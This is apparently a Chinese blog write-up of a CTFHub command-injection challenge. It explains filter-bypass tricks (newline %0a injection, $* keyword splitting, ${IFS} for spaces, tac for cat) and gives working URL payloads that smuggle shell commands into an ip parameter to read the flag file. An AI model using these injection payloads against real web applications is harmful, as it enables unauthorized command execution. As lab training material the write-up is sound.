RCE-文件包含/综合过滤练习(URL编码绕过,通过%0d%0a绕过;和&,通过$*绕过flag变为fl$*ag,)
一.题目链接:
https://www.ctfhub.com/#/skilltree
二.基础知识
2.1 当几乎全部被过滤的情况下使用什么绕过?
- 1.:使用回车(\r:%0d)或者换行符(\n:%0a)绕过,这里推荐
\n:%0a
eg:?ip=1%0d%0als#
核心作用是:回车是将打印头或光标移动到行首,不换行。换行是进行换行- 2.:通过
$*对关键词进行绕过
eg:fl$*ag_is_here
因为$*在执行的过程中会被当作空,所以可以绕过- 3.:通过
${IFS}对空格进行绕过- 4.:通过
tac对cat进行绕过
三.开始解题
注意这里要在url输入,因为框内输入会被二次url编码
1.查看源代码,发现对|,\,/,cat,flag,&,;都进行了过滤
2.将这些被过滤的字符都转换为url编码,playload分别如下
?ip=1%0als#
?ip=1%0Acd${IFS}fl$*ag_is_here%0Als
?ip=1%0Acd${IFS}fl$*ag_is_here%0Atac${IFS}fl$*ag_12184264096.php#
3.得到flag
浙公网安备 33010602011771号